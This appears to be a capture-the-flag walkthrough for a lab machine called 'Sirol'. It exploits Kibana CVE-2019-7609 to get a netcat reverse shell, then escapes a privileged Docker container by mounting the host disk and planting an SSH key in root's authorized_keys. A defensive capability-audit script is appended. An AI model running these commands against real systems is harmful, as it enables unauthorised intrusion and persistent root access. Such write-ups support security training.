Sirol
nmap
sudo rustscan -a 192.168.225.54 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
Kibana is running on port 5601

Web enumeration
Kibana is running version 6.5.0, which is vulnerable to remote code execution (CVE-2019-7609).

Exploitation
Visit https://github.com/LandGrey/CVE-2019-7609/ and copy the Python exploit to your local machine.

Set up a reverse shell listener
sudo nc -lvnp 80
Run the exploit
python exploit.py -u http://192.168.225.54:5601 -host <your machine's IP> -port 80 --shell
And you should receive a root shell inside a Docker container.

Privilege Escalation
Looks like the --privileged flag is set, since we can run fdisk -l

Let's mount /dev/sda1
mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola
Create a .ssh folder in /root
cd /mnt/hola/root
mkdir .ssh
cd .ssh
Copy your .ssh/id_rsa.pub and paste it into the remote machine's .ssh/authorized_keys
echo 'insert your public ssh key' > authorized_keys
Now you can SSH directly to the machine and escape the container.
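
The escape above depends on the container holding CAP_SYS_ADMIN, which --privileged grants and which mount requires. The following audit helper is an added example, not part of the original write-up: it decodes the CapEff mask from /proc/<pid>/status and flags capabilities that reach the host. The function names and the sample masks in the comments are assumptions made for illustration.

```shell
#!/bin/sh
# Audit helper: decode a CapEff bitmask (the hex value on the "CapEff:" line
# of /proc/<pid>/status) and list capabilities that let a container reach
# the host. Bit numbers are the capability numbers from linux/capability.h.
RISKY_CAPS="2:CAP_DAC_READ_SEARCH 16:CAP_SYS_MODULE 17:CAP_SYS_RAWIO 19:CAP_SYS_PTRACE 21:CAP_SYS_ADMIN"

# risky_caps HEX -> prints the risky capabilities set in HEX, space separated
risky_caps() {
    mask=$((0x$1))
    found=""
    for entry in $RISKY_CAPS; do
        bit=${entry%%:*}
        name=${entry#*:}
        if [ $(( (mask >> bit) & 1 )) -eq 1 ]; then
            found="${found:+$found }$name"
        fi
    done
    printf '%s\n' "$found"
}

# verdict HEX -> FAIL when CAP_SYS_ADMIN is present (mount is possible),
# WARN for other risky capabilities, OK when none are set
verdict() {
    caps=$(risky_caps "$1")
    case " $caps " in
        *" CAP_SYS_ADMIN "*) echo "FAIL: CAP_SYS_ADMIN present, host devices can be mounted" ;;
        "  ")                echo "OK: no host-reaching capabilities" ;;
        *)                   echo "WARN: $caps" ;;
    esac
}

# Constructed sample masks:
#   00000000a80425fb  typical Docker default capability set
#   0000003fffffffff  typical full set, as seen under --privileged
# Run inside the container being audited to check the current process.
if [ -r /proc/self/status ]; then
    capeff=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
    if [ -n "$capeff" ]; then
        echo "CapEff=$capeff -> $(verdict "$capeff")"
    fi
fi
```

A FAIL result means the workload should be redeployed without --privileged, granting only the individual capabilities it needs.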

Thanks for reading and enjoy the rest of your day!